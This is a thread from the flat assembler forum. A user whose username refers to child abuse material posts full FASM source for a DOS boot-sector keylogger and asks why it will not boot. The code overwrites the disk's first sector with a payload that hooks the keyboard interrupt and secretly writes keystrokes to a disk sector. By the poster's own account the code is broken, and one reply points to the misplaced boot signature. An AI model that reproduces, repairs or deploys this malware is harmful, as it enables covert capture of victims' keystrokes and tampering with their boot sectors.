flat assembler
Message board for the users of flat assembler.

Index > DOS > Very wierd problem in my keylogger

Author
Thread Post new topic Reply to topic
pedoCP



Joined: 27 Feb 2020
Posts: 1
pedoCP
I make a 1337 keylogger in FASM to be installed onto boot sector of OS however instead log keystrokes and write to a hard disk sector my keylogger dont boot with OS the problem is that is showed a message of boot sector dont found. Please read carefully my source:

Code:
org 0x100
mov ax,201h
mov bx,SETOR
mov cx,1
mov dx,0H
int 13h

mov ah,8
mov dx,0H
mov di,0
push es
mov es,di
INT 13H
pop es

mov ax,301h
sub cl,6
mov dl,0H
MOV WORD[SETOR+510],0AA55H
mov bx,SETOR
INT 13H

LEA DI,[SETOR+1Eh]
MOV SI,BOOT
MOV CX,1BDh
REP MOVSB

lea bx,[SETOR+1Eh]
MOV WORD[SETOR+510],0AA55H
mov ax,301h
mov dx,0H
mov cx,1
INT 13H

ret

SETOR DB 512 DUP (0)

BOOT:
cli
push es
mov ax,0
mov es,ax
es
mov cx,[24h]
es
mov dx,[26h]
es
mov [180h],cx
es
mov [182h],dx
mov cx,0
int 12h
sub ax,3
mov cl,6
shl ax,cl
mov cx,0
mov bp,ax
es
mov [24h],cx
es
mov [26h],bp
pop es
sti
push    es
mov             si,bp
mov             es,si
mov             si,7C00h + code         ;começo do programa
mov             di,0
mov             cx,446  ; TAMANHO DO MEU PAYLOAD
repz
movsb
pop             es

push            es
mov             ax,bp
mov             es,ax
mov             ax,0
mov             bx,7C00h + 480
mov             es,bp
es
mov             [bx],ax
pop             es

MOV AH,8
MOV DL,0
MOV DI,0
PUSH ES
MOV ES,DI
INT 13h
POP ES

MOV AX,201h
MOV BX,0
MOV ES,BX
MOV BX,500h
MOV DL,0
SUB CL,6
INT 13h



JMP 0:500h



code:
pushf
pushaw
sti

IN              AL,60H

push            ax
int             60h
pop             ax
push            cs
pop             bx
push            ds
mov             ds,bx
push            es
test            al,80h
jnz             L1
ds
mov             bx,[7C00h+480]
ds
lea             si,[7C00h+482]
ds
mov             [si+bx],al
inc             bx
ds
mov             [7C00h+480],bx
L1:
cmp             bx,512
jz              zera
jmp             pula
zera:
mov             ax,0
mov             [7C00h+480],ax
pula:
push            es

mov             cx,ds   ;Traduz os 512 bytes de scan codes para ascii
mov             es,cx
mov             cx,1
push            bx
dec             bx
ds
lea             si,[7C00h+482+bx]
pop             bx

int             12h
sub             ax,4
mov             cl,6
shl             ax,cl
mov             bp,ax

MOV AH,8
MOV DL,0
PUSH ES
MOV DI,0
MOV ES,DI
INT 13h
POP ES

MOV AX,301h
push bx
lea bx,[bx]
SUB CL,7
MOV DL,0
INT 13h
pop bx

POP             ES

skip:
mov             al,20h
out             20h,al
pop             es
pop             ds
popaw
popf
iret

codesize:
db 55h
db AAh

    


Where is my error?
Post 27 Feb 2020, 01:33
View user's profile Send private message Reply with quote
bitshifter



Joined: 04 Dec 2007
Posts: 764
Location: Massachusetts, USA
bitshifter
first make valid simple boot sector, then insert extra code in correct places, learn much you will.

_________________
Coding a 3D game engine with fasm is like trying to eat an elephant,
you just have to keep focused and take it one 'byte' at a time.
Post 19 Mar 2020, 01:48
View user's profile Send private message Reply with quote
DimonSoft



Joined: 03 Mar 2010
Posts: 702
Location: Belarus
DimonSoft
Boot signature 55 AA must be in a very particular place. It isn’t. Haven’t I seen this code before at the forum?
Post 19 Mar 2020, 08:34
View user's profile Send private message Visit poster's website Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2020, Tomasz Grysztar.

Powered by rwasa.